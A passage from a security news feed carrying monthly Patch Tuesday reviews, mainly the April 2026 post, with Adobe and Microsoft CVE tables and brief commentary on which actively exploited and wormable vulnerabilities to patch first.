  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21247"><span><span> </span>CVE-2026-21247<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21248"><span><span> </span>CVE-2026-21248<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21255"><span><span> </span>CVE-2026-21255<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Hyper-V Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21231"><span><span> </span>CVE-2026-21231<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21239"><span><span> </span>CVE-2026-21239<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21245"><span><span> </span>CVE-2026-21245<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21222"><span><span> </span>CVE-2026-21222<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Kernel Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21243"><span><span> </span>CVE-2026-21243<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Lightweight Directory Access
  Protocol (LDAP) Denial of Service Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">DoS</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841"><span><span> </span>CVE-2026-20841<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Notepad App Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21249"><span><span> </span>CVE-2026-21249<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows NTLM Spoofing Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">3.3</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21508"><span><span> </span>CVE-2026-21508<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Storage Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21237"><span><span> </span>CVE-2026-21237<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Subsystem for Linux Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21242"><span><span> </span>CVE-2026-21242<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Subsystem for Linux Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-1861"><span><span> </span>CVE-2026-1861 *</span></a></td>
  <td width="263" class="xl75"><span> </span>Chromium: CVE-2026-1861 Heap buffer overflow
  in libvpx<span> </span></td>
  <td class="xl67"><span> </span>High</td>
  <td class="xl65">N/A</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-1862"><span><span> </span>CVE-2026-1862 *</span></a></td>
  <td width="263" class="xl75"><span> </span>Chromium: CVE-2026-1862 Type Confusion in
  V8<span> </span></td>
  <td class="xl67"><span> </span>High</td>
  <td class="xl65">N/A</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0391"><span><span> </span>CVE-2026-0391<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Edge (Chromium-based) for Android
  Spoofing Vulnerability<span> </span></td>
  <td class="xl68"><span> </span>Moderate<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="151"></td>
  <td width="263"></td>
  <td width="111"></td>
  <td width="111"></td>
  <td width="111"></td>
  <td width="111"></td>
  <td width="95"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Moving on to the Critical-rated bugs, the patch for Azure Front Door sounds frightening, but Microsoft has already fixed the bug and is just now documenting it. That’s also true for the bugs in Azure Arc and Azure Function. There are two Critical-rated bugs in the ACI Confidential Containers. The first allows a container escape while the second discloses secret tokens and keys. Either way, you’ll want to handle those quickly.</p><p class="">Taking a look at the other code execution vulnerabilities in this month’s release, we start with a frightening looking bug in Azure SDK for Python that has the highest CVSS this month of 9.8. A remote, unauthenticated attacker code gain code execution on an affected system via a maliciously crafted continuation token. It’s not clear why this isn’t rated Critical, but I would treat it as such. The three bugs in Hyper-V are actually local open-and-own bugs that require a user to open a malicious file on an affected system. That’s also true for the bug in Notepad. The bug in Power BI is confusing, because Microsoft says it requires authentication and could lead to an attacker running code as an authenticated user. There’s the poorly named “Azure Local Remote Code Execution Vulnerability”, but it requires a machine-in-the-middle (MitM) to exploit. The bug in Defender for Endpoint Linux is restricted to local subnets, but you’ll need to enable auto provisioning to get the patch. The final code execution bugs addressed this month are in GitHub Copilot. Two are command injections and the other is a Time-of-check time-of-use (toctou) race condition, but both could end up in code execution on affected systems.</p><p class="">Patches for Elevation of Privilege (EoP) bugs make up nearly 50% of this release, but most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges. There are only two of note. The first is a command injection bug in GitHub Copilot that leads to executing code at the level of the targeted application. The second is a bug in a kernel that leads to SYSTEM but could also be used for a sandbox escape.</p><p class="">There’s a unusually high number of spoofing bugs in this month’s release, and the ones for Outlook are the most troubling. First, the Preview Pane is an attack vector. Secondly, the bugs could be used to relay NTLM credentials via just an email, which could result in credential disclosure. And you’ll need multiple patches to fully address these bugs. At least they can be applied in any order.  There’s a UI misrepresentation bug in Exchange Server that could allow an attacker to either view some sensitive information or “make changes to disclosed information”. At what point does data become disclosed? That odd phrasing makes me think they are using AI to right some of their descriptions. The phrasing also appears in the patch for NTLM. That bug is triggered by opening a specially crafted Office doc, and while they explicitly say it could be used to relay NTLM creds, it sure seems that way. The patch for .NET and Visual Studio fixes a bug that allows attackers to bypass header validation, resulting in the service accepting a message it should reject. Finally, the bug in Azure HDInsight is really just a cross-site scripting (XSS) bug. The caveat here is that you need to restart Ambari server in both of the head nodes to have this fix updated. There is also an XSS in Azure Devops Server, but at least it is labelled as such.</p><p class="">There are a couple of additional security feature bypass bugs to discuss. The first is in Hyper-V and bypasses the Virtualization-based Security feature. The other is in GitHub Copilot and Visual Studio Code. It’s another command injection, but this one can be used to bypass authentication. Neat.</p><p class="">Looking at the remaining info disclosure bugs getting patched this month, most simply result in info leaks consisting of unspecified memory contents or memory addresses. The exception is the bug in Azure IoT Explorer. This bug could be used to view the contents of the target user’s local file system.</p><p class="">We end this month’s release with two DoS bugs: one in LDAP and one in GDI+. Neither descriptions from Microsoft provide any usable information.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">I plan on being back home for the March release but wherever I’m at, you can rest assured that March 10, I’ll be here to provide my assessment of the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The April 2026 Security Update Review]]></title>
<description><![CDATA[It’s time once again for Patch Tuesday, and this one is huge. We’ve also got multiple exploits in the wild, which adds another layer of urgency to this month’s release. Take a break from your regularly scheduled activities, and let’s take a look at the latest security patches from Adobe and Micro...]]></description>
<link>https://tsecurity.de/de/3694470/it-security-nachrichten/the-april-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694470/it-security-nachrichten/the-april-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:00:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">It’s time once again for Patch Tuesday, and this one is huge. We’ve also got multiple exploits in the wild, which adds another layer of urgency to this month’s release. Take a break from your regularly scheduled activities, and let’s take a look at the latest security patches from Adobe and Microsoft. If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for April 2026</strong></p><p class="">For April, Adobe released 12 bulletins addressing 61 unique CVEs in Adobe Acrobat Reader, InDesign, InCopy, FrameMaker, Connect, ColdFusion, Bridge, Photoshop, Illustrator, Experience Manager Screens, and the Adobe DNG SDK. Three of the Cold Fusion bugs came through the TrendAI ZDI program. For this month, I’m introducing an Adobe table as well. I’d love to get your feedback on whether this is helpful.</p>





















  
  




  


  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-43.html" target="_blank">APSB26-43</a></td>
    <td>Adobe Acrobat Reader</td>
    <td>1</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>Yes</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-44.html" target="_blank">APSB26-44</a></td>
    <td>Adobe Acrobat Reader</td>
    <td>2</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/indesign/apsb26-32.html" target="_blank">APSB26-32</a></td>
    <td>Adobe InDesign</td>
    <td>9</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/incopy/apsb26-33.html" target="_blank">APSB26-33</a></td>
    <td>Adobe InCopy</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/framemaker/apsb26-36.html" target="_blank">APSB26-36</a></td>
    <td>Adobe FrameMaker</td>
    <td>11</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/connect/apsb26-37.html" target="_blank">APSB26-37</a></td>
    <td>Adobe Connect</td>
    <td>9</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html" target="_blank">APSB26-38</a></td>
    <td>Adobe ColdFusion</td>
    <td>7</td>
    <td>Critical</td>
    <td>9.3</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/bridge/apsb26-39.html" target="_blank">APSB26-39</a></td>
    <td>Adobe Bridge</td>
    <td>6</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/photoshop/apsb26-40.html" target="_blank">APSB26-40</a></td>
    <td>Adobe Photoshop</td>
    <td>1</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/illustrator/apsb26-42.html" target="_blank">APSB26-42</a></td>
    <td>Adobe Illustrator</td>
    <td>1</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html" target="_blank">APSB26-34</a></td>
    <td>Adobe Experience Manager Screens</td>
    <td>9</td>
    <td>Important</td>
    <td>5.4</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/dng-sdk/apsb26-41.html" target="_blank">APSB26-41</a></td>
    <td>Adobe DNG SDK</td>
    <td>3</td>
    <td>Important</td>
    <td>5.5</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
</table>



  
  









  <p class="">Obviously, the active attack in Reader is the highest priority for this month, but don’t ignore the second bunch of Reader patches. Cold Fusion also gets a deployment priority of 1, so if you’re still running that platform, make sure you get the update. Otherwise, the FrameMaker and Connect patches fix 11 and nine bugs, respectively. InDesign and Experience Manager Screens also have nine CVEs addressed. </p><p class="">Outside of the Reader bug, none of the other bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. One of the Reader bugs and Cold Fusion have a deployment priority of one, the other Reader bug has a priority of two, while all of the other updates released by Adobe this month are listed as deployment priority 3.</p><p class=""><strong>Microsoft Patches for April 2026</strong></p><p class="">This month, Microsoft released a monstrous 163 new CVEs in Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, SQL Server, Hyper-V Server, BitLocker, and the Windows Wallet Service. Counting the third-party and a huge Chromium release, it brings the total number of CVEs to a staggering 247 updates. Six of these bugs were reported through the TrendAI ZDI program. Eight of these bugs are rated Critical, two are rated as Moderate, and the rest are rated Important in severity.</p><p class="">By my count, this is the second-largest monthly release in Microsoft’s history. There are many things we could speculate on to justify the size, but if Microsoft is like the other programs out there (including ours), they are likely seeing a rise in submissions found by AI tools. For us, our incoming rate has essentially tripled, making triage a challenge, to say the least. Whatever the reason, we have a lot of bugs to deal with this month. I should also point out that the Pwn2Own Berlin occurs next month, and it’s typical for vendors to patch as much as they can before the event.</p><p class="">There is one Microsoft bug listed as under active attack at the time of release, and one other that’s publicly known. Let’s take a closer look at some of the more interesting updates for this month, starting with the vulnerability being exploited in the wild:</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201" target="_blank"><strong>CVE-2026-32201</strong></a><strong> - Microsoft SharePoint Server Spoofing Vulnerability<br></strong>Microsoft doesn’t provide a lot of information about this bug, but Spoofing bugs in SharePoint often manifest as cross-site scripting (XSS) bugs. They do note that attackers could view information or make changes to disclosed information. As always, they don’t provide any information on how widespread these attacks are, but I wouldn’t wait to test and deploy this fix – especially if you have internet-connected SharePoint servers.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825" target="_blank"><strong>CVE-2026-33825</strong></a><strong> - Microsoft Defender Elevation of Privilege Vulnerability<br></strong>This bug is listed as publicly known, and this time, we know exactly <a href="https://deadeclipse666.blogspot.com/2026/04/public-disclosure.html" target="_blank">where</a> it was disclosed. There have been some questions about how exploitable this bug may be, but it does look like it’s a real problem – just with some reliability issues in its current state. I won’t add on to the commentary from the researcher about working with Microsoft. I’m just glad they are offering a fix for the vulnerability. If you rely on Defender, test and deploy this one quickly.</p><p class="">-   <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33827" target="_blank"><strong>CVE-2026-33827</strong></a><strong> - Windows TCP/IP Remote Code Execution Vulnerability<br></strong>This vulnerability allows remote, unauthenticated attackers to exploit code on affected systems without user interaction. That adds up to a wormable bug – at least on systems with IPv6 and IPSec enabled. It is a race condition, which sets exploitability to High on the CVSS scale, but we see race conditions exploited at Pwn2Own all the time, so don’t rely on that obstacle. If you’re running IPv6, I would test and deploy this fix quickly before public exploits become available.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33824" target="_blank"><strong>CVE-2026-33824</strong></a><strong> - Windows Internet Key Exchange (IKE) Service Extensions Remote Code Execution Vulnerability<br></strong>Speaking of wormable bugs, here’s our second one this month. By the title, we can tell that systems with IKE enabled are affected, but that leaves plenty of targets for attackers. Microsoft also notes a significant mitigation for this bug. Blocking UDP ports 500 and 4500 at the perimeter prevents external attackers from reaching the affected service. However, insiders could still target this for lateral movement within an enterprise. For enterprises using IKE, get this fix tested and deployed with haste.</p><p class="">Here’s the full list of CVEs released by Microsoft for April 2026:</p>





















  
  




  


  
    




<title>April 2026 Patch Tuesday</title>



<table>
<thead><tr>
  <th>CVE</th>
  <th>Title</th>
  <th>Severity</th>
  <th>CVSS</th>
  <th>Public</th>
  <th>Exploited</th>
  <th>Type</th>
</tr></thead>
<tbody>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201">CVE-2026-32201</a></td>
  <td>Microsoft SharePoint Server Spoofing Vulnerability</td>
  <td>Important</td>
  <td>6.5</td>
  <td>No</td>
  <td>Yes</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-5281">CVE-2026-5281 *</a></td>
  <td>Chromium: CVE-2026-5281 Use after free in Dawn</td>
  <td>High</td>
  <td>N/A</td>
  <td>No</td>
  <td>Yes</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825">CVE-2026-33825</a></td>
  <td>Microsoft Defender Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>Yes</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23666">CVE-2026-23666</a></td>
  <td>.NET Framework Denial of Service Vulnerability</td>
  <td>Critical</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32190">CVE-2026-32190</a></td>
  <td>Microsoft Office Remote Code Execution Vulnerability</td>
  <td>Critical</td>
  <td>8.4</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33114">CVE-2026-33114</a></td>
  <td>Microsoft Word Remote Code Execution Vulnerability</td>
  <td>Critical</td>
  <td>8.4</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33115">CVE-2026-33115</a></td>
  <td>Microsoft Word Remote Code Execution Vulnerability</td>
  <td>Critical</td>
  <td>8.4</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32157">CVE-2026-32157</a></td>
  <td>Remote Desktop Client Remote Code Execution Vulnerability</td>
  <td>Critical</td>
  <td>8.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33826">CVE-2026-33826</a></td>
  <td>Windows Active Directory Remote Code Execution Vulnerability</td>
  <td>Critical</td>
  <td>8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33824">CVE-2026-33824</a></td>
  <td>Windows Internet Key Exchange (IKE) Service Extensions Remote Code Execution Vulnerability</td>
  <td>Critical</td>
  <td>9.8</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33827">CVE-2026-33827</a></td>
  <td>Windows TCP/IP Remote Code Execution Vulnerability</td>
  <td>Critical</td>
  <td>8.1</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26171">CVE-2026-26171</a></td>
  <td>.NET Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32226">CVE-2026-32226</a></td>
  <td>.NET Framework Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>5.9</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32178">CVE-2026-32178</a></td>
  <td>.NET Spoofing Vulnerability</td>
  <td>Important</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32203">CVE-2026-32203</a></td>
  <td>.NET and Visual Studio Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33116">CVE-2026-33116</a></td>
  <td>.NET, .NET Framework, and Visual Studio Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>7.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-20585">CVE-2023-20585 *</a></td>
  <td>AMD: CVE-2023-20585 IOMMU Write Buffer Vulnerability</td>
  <td>Important</td>
  <td>5.3</td>
  <td>No</td>
  <td>No</td>
  <td>RCE</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32072">CVE-2026-32072</a></td>
  <td>Active Directory Spoofing Vulnerability</td>
  <td>Important</td>
  <td>6.2</td>
  <td>No</td>
  <td>No</td>
  <td>Spoofing</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-25184">CVE-2026-25184</a></td>
  <td>Applocker Filter Driver (applockerfltr.sys) Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32171">CVE-2026-32171</a></td>
  <td>Azure Logic Apps Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>8.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32168">CVE-2026-32168</a></td>
  <td>Azure Monitor Agent Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32192">CVE-2026-32192</a></td>
  <td>Azure Monitor Agent Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32181">CVE-2026-32181</a></td>
  <td>Connected User Experiences and Telemetry Service Denial of Service Vulnerability</td>
  <td>Important</td>
  <td>5.5</td>
  <td>No</td>
  <td>No</td>
  <td>DoS</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27924">CVE-2026-27924</a></td>
  <td>Desktop Window Manager Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32152">CVE-2026-32152</a></td>
  <td>Desktop Window Manager Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32154">CVE-2026-32154</a></td>
  <td>Desktop Window Manager Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27923">CVE-2026-27923</a></td>
  <td>Desktop Window Manager Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32155">CVE-2026-32155</a></td>
  <td>Desktop Window Manager Elevation of Privilege Vulnerability</td>
  <td>Important</td>
  <td>7.8</td>
  <td>No</td>
  <td>No</td>
  <td>EoP</td>
</tr>
<tr>
  <td><a target="_blank" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23653">CVE-2026-23653</a></td>
  <td>GitHub Copilot and Visual Studio Code Information Disclosure Vulnerability</td>
  <td>Important</td>
  <td>5.7</td>
